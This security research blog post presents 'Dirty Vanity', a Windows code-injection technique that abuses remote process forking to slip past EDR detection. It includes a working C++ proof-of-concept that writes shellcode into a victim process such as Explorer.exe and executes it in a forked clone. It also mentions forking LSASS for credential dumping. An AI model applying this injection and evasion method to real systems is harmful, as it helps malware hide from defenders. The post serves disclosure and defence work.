APRIL 12, 2023

Dirty Vanity: A New Approach to Code Injection & EDR Bypass

Dirty Vanity is a new code-injection technique that abuses forking, a lesser-known mechanism that exists in Windows operating systems. In this post, we will dive deep into forking, explore its legitimate use, and show how it can be manipulated into blind-sighting EDRs by injecting malicious code.

Implementing a new code-injection technique normally follows a simple formula, which makes defending against these attacks manageable. Occasionally, a new eccentric technique is introduced that cannot be mitigated by the normal protocol. Case in point: Dirty Vanity.

Forking Background

Forking a process is the act of creating a new process from the calling process. The name “fork” originates from the UNIX system calls of process creation – ‘fork’ and ‘exec.’

Dirty Vanity is an abuse of the legitimate forking mechanism that exists in Windows.

The Windows Fork

Windows itself doesn’t make use of fork and exec for process creation. However, it did support it with its legacy POSIX subsystem (included since the first edition of windows NT in 1993), which is meant to support basic UNIX binary execution. The POSIX subsystem has long been replaced (first by Windows Services for UNIX (SFU) in windows XP, and later by the current Windows Subsystem for Linux (WSL)) yet its code still affects windows to this day.

Below is a look at psxdll.dll, a dll that was a core part of this subsystem, which exported basic UNIX API:

Figure 1: Fork Origins
Figure 1: Fork Origins

As we can see this _fork is internally implemented with a call to Ntdll's RtlCloneUserProcess which does the actual forking.

In the above example we see the origin of the Windows Fork and the following mechanisms still use forking to this day:

Process Reflection - a forking mechanism whose goal is to allow analysis on processes that should continuously provide service. WDI (Windows Diagnostics Infrastructure) uses Process Reflection to do just this:

Figure 2: Process Reflection
Figure 2: Process Reflection

Process Snapshotting - enables you to capture process state, in part or whole. It can efficiently capture the virtual address contents of a process using the Windows internal POSIX fork clone capability.

A malicious use case example:
Credential Dumping via forking - In the credential dumping realm many defenses are focused on LSASS.exe, which stores logged user credentials. There is a forking bypass for those defenses that utilize one of the previous mentioned forking mechanisms to fork LSASS, and access the lesser protected fork contents:

Figure 3: Credential Dumping via Forking
Figure 3: Credential Dumping via Forking

In summary, Windows contains a forking capability that is like the traditional UNIX fork it originally aimed to support, yet it reveals a different and more powerful remote fork option. With this remote fork possibility in Windows, we can manipulate defenses as seen in the above malicious LSASS dumping use case. In the case of Dirty Vanity, we will demonstrate how it can be further abused.

Forking API

Before presenting how Dirty Vanity abuses remote forking, we will cover the Windows API that can invoke a fork. We begin with the API supporting the POSIX base fork:

RtlCloneUserProcess(  
ULONG ProcessFlags,
PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
HANDLE DebugPort,
PRTL_USER_PROCESS_INFORMATION ProcessInformation);

RtlCloneUserProcess is essentially a wrapper around NtCreateUserProcess, invoking the same ability

NtCreateUserProcess(
PHANDLE ProcessHandle,
PHANDLE ThreadHandle,
ACCESS_MASK ProcessDesiredAccess,
ACCESS_MASK ThreadDesiredAccess,
POBJECT_ATTRIBUTES ProcessObjectAttributes,
POBJECT_ATTRIBUTES ThreadObjectAttributes,
ULONG ProcessFlags,
ULONG ThreadFlags,
PVOID ProcessParameters,
PPS_CREATE_INFO CreateInfo,
PPS_ATTRIBUTE_LIST AttributeList);

NtCreateUserProcess is a system call. It exposes process forking by setting the PS_ATTRIBUTE_PARENT_PROCESS within the PPS_ATTRIBUTE_LIST AttributeList parameter, presented below:

NTSTATUS NtForkUserProcess()
{
HANDLE hProcess = nullptr, hThread = nullptr;
OBJECT_ATTRIBUTES poa = { sizeof(poa) };
OBJECT_ATTRIBUTES toa = { sizeof(toa) };
PS_CREATE_INFO createInfo = {sizeof(createInfo)};
createInfo.State = PsCreateInitialState;
// Add a parent handle in attribute list
PPS_ATTRIBUTE_LIST attributeList;
PPS_ATTRIBUTE attribute;
UCHAR attributeListBuffer[FIELD_OFFSET(PS_ATTRIBUTE_LIST, Attributes) + sizeof(PS_ATTRIBUTE) * 1];
memset(attributeListBuffer, 0, sizeof(attributeListBuffer));
attributeList = reinterpret_cast<PPS_ATTRIBUTE_LIST>(attributeListBuffer);
attributeList->TotalLength = FIELD_OFFSET(PS_ATTRIBUTE_LIST, Attributes) + sizeof(PS_ATTRIBUTE) * 1;
attribute = &attributeList->Attributes[0];
attribute->Attribute = PS_ATTRIBUTE_PARENT_PROCESS;
attribute->Size = sizeof(HANDLE);
attribute->ValuePtr = GetCurrentProcess();

NtCreateUserProcessFunc const NtCreateUserProcess = reinterpret_cast<NtCreateUserProcessFunc>(GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateUserProcess"));
NTSTATUS res = NtCreateUserProcess(&hProcess, &hThread, 0, 0, nullptr, nullptr, PROCESS_CREATE_FLAGS_INHERIT_FROM_PARENT | PROCESS_CREATE_FLAGS_INHERIT_HANDLES, THREAD_CREATE_FLAGS_CREATE_SUSPENDED, nullptr, &createInfo, attributeList);
auto pid = GetProcessId(hProcess);
return res;
}

As we concluded, the more powerful variant of fork Windows is the remote fork, yet if we try to replace the attribute->ValuePtr = GetCurrentProcess(); in this example with a different handle: attribute->ValuePtr = someOtherHandle; we will fail with STATUS_INVALID_PARAMETER==0xC000000D meaning this API is not capable of remote forking.

Remote Forking

We will now explore the API behind Process Reflection & Process Snapshotting, as these are the mechanisms that provide remote forking in Windows.

Process Snapshotting is invoked with Kernel32!PssCaptureSnapshot and if we go down the call chain we will see Kernel32!PssCaptureSnapshot calls ntdll!PssNtCaptureSnapshot calls ntdll!NtCreateProcessEx.

Let’s take a look at NtCreateProcessEx and its legacy version NtCreateProcess

NtCreateProcessEx(PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes ,
HANDLE ParentProcess,
ULONG Flags,
HANDLE SectionHandle,
HANDLE DebugPort,
HANDLE ExceptionPort,
BOOLEAN InJob);
NtCreateProcess(
PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
HANDLE ParentProcess,
BOOLEAN InheritObjectTable,
HANDLE SectionHandle,
HANDLE DebugPort,
HANDLE ExceptionPort);

NtCreateProcess[Ex] are two legacy process creation syscalls that offer another route to access the forking mechanism. However, as opposed to the newer NtCreateUserProcess, one can fork a remote process with them by setting the HANDLE ParentProcess parameter with the target process handle.

Process Reflection is invoked with RtlCreateProcessReflection

RtlCreateProcessReflection(
HANDLE ProcessHandle,
ULONG Flags,
PVOID StartRoutine,
PVOID StartContext,
HANDLE EventHandle,
T_RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION* ReflectionInformation);

RtlCreateProcessReflection will fork the process represented by HANDLE ProcessHandle.

It performs the following actions:

  1. Creates a shared memory section.
  2. Populates the shared memory section with parameters.
  3. Maps the shared memory section into the current and target processes.
  4. Creates a thread on the target process via a call to RtlpCreateUserThreadEx. The thread is directed to begin execution in ntdll’s RtlpProcessReflectionStartup function.
  5. The created thread calls RtlCloneUserProcess, passing the parameters it obtains from the memory mapping it shares with the initiating process. RtlCloneUserProcess as mentioned before wraps NtCreateUserProcess that forks the current process to the new target.
  6. In kernel mode NtCreateUserProcess executes most of the same code paths as when it creates a new process, with the exception that PspAllocateProcess, which it calls to create the process object and initial thread, calls MmInitializeProcessAddressSpace with a flag specifying that the address should be a copy-on-write copy of the target process instead of an initial process address space.
  7. If the caller of RtlCreateProcessReflection specified a PVOID StartRoutine, RtlpProcessReflectionStartup will transfer execution to it prior to closing. It will also provide PVOID StartContext as an argument if supplied.

As you’ve probably guessed, PVOID StartRoutine plays a key role in Dirty Vanity.

Most of the forking heavy lifting is done in kernel mode, and one of the most interesting parts is that it copies all the target process address space to the forked process, including dynamic allocations and runtime modifications, which brings us to Dirty Vanity.

Dirty Vanity Set Up

Code Injection and Endpoint Detection and Response (EDR)

Let's briefly cover the steps of a traditional injection.

To get an injected code up and running in a target process, an injector will do the following:

  • STEP 1: Allocate space for the shellcode to inject or find a code cave for it.
  • STEP 2: Write the shellcode to the space created in STEP 1 using various write primitives.
    • WriteProcessMemory
    • NtMapViewOfSection
    • GlobalAddAtom
  • STEP 3: Execute the written shellcode from STEP 2 using various execution primitives.
    • NtSetContextThread
    • NtQueueApcThread
    • IAT Hook & invoking the hook

An injector can choose any Allocate, Write, and Execute primitive combination, invoke them, and create an injection.

Due to the dynamic nature of injection primitives, most EDRs will attempt to deal with injections by hooking all the primitives they are aware of. The following is an example of this approach where Injector.exe is performing the simplest injection on Explorer.exe:

Figure 4: Simple Injection on Explorer.exe
Figure 4: Simple Injection on Explorer.exe

When an EDR monitors the system, it monitors for all primitives on the same target and catches all the three on Explorer.exe:

  • Allocation = VirtualAllocEx
  • Write content to the allocation = WriteProcessMemory
  • Execution of the written content = CreateRemoteThread

When the final execution primitive is monitored the EDR will detect/block this injection attempt.

Dirty Vanity in Action

Dirty Vanity abuses the previously described remote forking mechanism in Windows as a new primitive in the injection realm - Fork. The concept behind it is simple, and it is comprised of the following steps:

  1. Initial Write Step: allocate and write your payload to a target process in whatever way preferred, i.e.:
    1. VirtualAllocEx & WriteProcessMemory
    2. NtCreateSection & NtMapViewOfSection
    3. Any other preferred way
  2. Fork & Execute Step: preform a remote fork on the target process, and set the process start address to the payload (which gets forked to the same location), with:
    1. RtlCreateProcessReflection (PVOID StartRoutine = points to cloned shellcode)
    2. NtCreateProcess[Ex] + any execute primitive on the cloned shellcode

Let’s apply these steps to our previous example:

Figure 5: Dirty Vanity Flow
Figure 5: Dirty Vanity Flow

Injector.exe starts things normally with VirtualAllocEx followed by WriteProcessMemory over Explorer.exe. An EDR monitoring this system correlates those operations and waits for a third execution primitive to mark this operation as an Injection.

In Dirty Vanity this anticipated execution primitive does not happen and instead we resume to a remote fork API.

Explorer.exe is now forked to a copy of itself and the forked result process contains a copy of the Explorer.exe address space, including the payload from the Initial Write Step loaded at the same address with the same memory protection.

By setting the forked processes start address to our payload it will execute. This can be done with:

  1. RtlCreateProcessReflection(PVOID StartRoutine = points to cloned shellcode)
  2. NtCreateProcess[Ex] + a follow up execute primitive on the cloned shellcode

After these steps are completed our forked Explorer.exe contains our payload and executes it.

The novelty behind Dirty Vanity is the separation that the fork creates: While the allocate and write stages are done normally on a target process, they won’t get caught, as the actual execution stage (critical to seal the deal as an injection for the EDR perspective) is performed by and on the forked target process.

From the EDRs point of view the new forked Explorer.exe was never written to, and an execution on it does not correlate with a write attempt.

Due to this unique execution, Dirty Vanity slips past common EDR detection methods.

Prerequisites to run Dirty Vanity

In order to invoke Dirty Vanity we need a target process handle with the following access rights:

  • RtlCreateProcessReflection variant: PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD |PROCESS_DUP_HANDLE
  • NtCreateProcess[Ex] variant: PROCESS_CREATE_PROCESS

For a complete implementation, the target process handle should contain a combination of these access rights and the ones fitting for your choice of Initial Write Step.

Dirty Vanity via RtlCreateProcessReflection

The research behind this blog was focused on a POC with the RtlCreateProcessReflection approach.

Here is a code snippet performing Dirty Vanity with it:

unsigned char shellcode[] = {0x40, 0x55, 0x57, ...};
size_t bytesWritten = 0;

// Opening the fork target with the appropriate rights
HANDLE victimHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, TRUE, victimPid);

// Allocate shellcode size within the target
DWORD_PTR shellcodeSize = sizeof(shellcode);
LPVOID baseAddress = VirtualAllocEx(victimHandle, nullptr, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

// Write the shellcode
BOOL status = WriteProcessMemory(victimHandle, baseAddress, shellcode, shellcodeSize, &bytesWritten);
#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
HMODULE ntlib = LoadLibraryA("ntdll.dll");
Rtl_CreateProcessReflection RtlCreateProcessReflection = (Rtl_CreateProcessReflection)GetProcAddress(ntlib, "RtlCreateProcessReflection");
T_RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION info = { 0 };

// Fork target & Execute shellcode base within clone
NTSTATUS ret = RtlCreateProcessReflection(victimHandle, RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES, baseAddress, NULL, NULL, &info);

When first attempting this POC we used a basic MessageBoxA shellcode which resulted an Access violation exception:

1:002> g
(6738.da4): Access violation - code c0000005 (first chance)

First-chance exceptions are reported before any exception handling.

This exception may be expected and handled.
USER32!GetDpiForCurrentProcess+0x14:

00007ff8`8b75719c 0fb798661b0000 movzx ebx,word ptr [rax+1B66h] ds:000002d3`6ef92ba6=????
1:002> k
# Child-SP RetAddr Call Site
00 000000da`df9ffb10 00007ff8`8b7570c2 USER32!GetDpiForCurrentProcess+0x14
01 000000da`df9ffb40 00007ff8`8b75703b USER32!ValidateDpiAwarenessContextEx+0x32
02 000000da`df9ffb70 00007ff8`8b7bc2da USER32!SetThreadDpiAwarenessContext+0x4b
03 000000da`df9ffba0 00007ff8`8b7bc0d8 USER32!MessageBoxTimeoutW+0x19a
04 000000da`df9ffca0 00007ff8`8b7bbcee USER32!MessageBoxTimeoutA+0x108
05 000000da`df9ffd00 000002d3`71bf0050 USER32!MessageBoxA+0x4e
06 000000da`df9ffd40 00007ff8`8c210000 0x000002d3`71bf0050

The shellcode was effectively forked and executed, yet the internals of USER32!MessageBoxA failed to operate from within the fork.

In short, USER32!MessageBoxA needs the user32!gSharedInfo structure to be mapped to the process.

Our forked process is lacking it because user32!gSharedInfo is explicitly mapped to each process with the ViewUnmap setting:

“ViewUnmap: The view will not be mapped into child processes “ -MSDN

This means, ViewUnmap data (like the user32!gSharedInfo ) is hidden from cloned process sons. To overcome this obstacle, the approach our POC takes is using an NTDLL only shellcode, which is completely standalone, and as such has no dependency in such sections.

We have used https://github.com/rainerzufalldererste/windows_x64_shellcode_template as a template to create a custom ntdll based shellcode, that preforms:

  1. Detection of Ntdll API from the LDR
  2. Parameter creation with RtlInitUnicodeString & RtlAllocateHeap & RtlCreateProcessParametersEx
  3. Invocation of NtCreateUserProcess
    1. process: C:\Windows\System32\cmd.exe
    2. Command line: /k msg * “Hello from Dirty Vanity”

For the full source code: https://github.com/deepinstinct/Dirty-Vanity

Wrapping it together:

Figure 6: Dirty Vanity invoked over Explorer’s PID
Figure 6: Dirty Vanity invoked over Explorer’s PID

Figure 7: The result process tree, with the forked Explorer child executing our shellcode.
Figure 7: The result process tree, with the forked Explorer child executing our shellcode.

Summary

To detect code injections, EDR solutions traditionally monitor and correlate ‘Allocate / Write / Execute’ operations that are performed on the same process. Fork API introduces a new injection primitive – Fork, that challenges the traditional detection approach.

Dirty Vanity makes use of forking to clone any Allocate and Write efforts to a new process. From the EDR perspective this process was never written to – and thus won't be flagged as injected – when eventually executed by:

  • Fork & Execute with RtlCreateProcessReflection, which is the focus of this research.
  • Ordinary Execute primitives after a call to RtlCreateProcessReflection, or NtCreateProcess[Ex] which is still an unexplored path.

Dirty Vanity changes how we look at injection defense because forking changes the rules of OS monitoring, and EDRs must respond with monitoring all the forking primitives presented, eventually tracking forked processes, and treat them with same knowledge it has on their parent.

For additional details behind this case, and more about the research process check out the Black Hat presentation by the Deep Instinct Research team here: https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf

References

  1. https://github.com/deepinstinct/Dirty-Vanity
  2. https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf
  3. https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/ talking about forking locally with RtlCloneUserProcess & NtCreateUserProcess
  4. https://gist.github.com/juntalis/4366916 & https://gist.github.com/Cr4sh/126d844c28a7fbfd25c6 RtlCloneUserProcess usage, and useful constants
  5. https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c Credential dump use case using RtlCreateProcessReflection. it took reflection code from the next link
  6. https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp RtlCreateProcessReflection source code framework
  7. https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ PssCaptureSnapshot → NtCreateProcessEx
  8. Windows Internals 7th part 1 on RtlCreateProcessReflection
  9. https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2011/BH_US_11_Mandt_win32k_Slides.pdf
  10. https://www.youtube.com/watch?v=EkGDSqpfzgg
  11. https://github.com/rainerzufalldererste/windows_x64_shellcode_template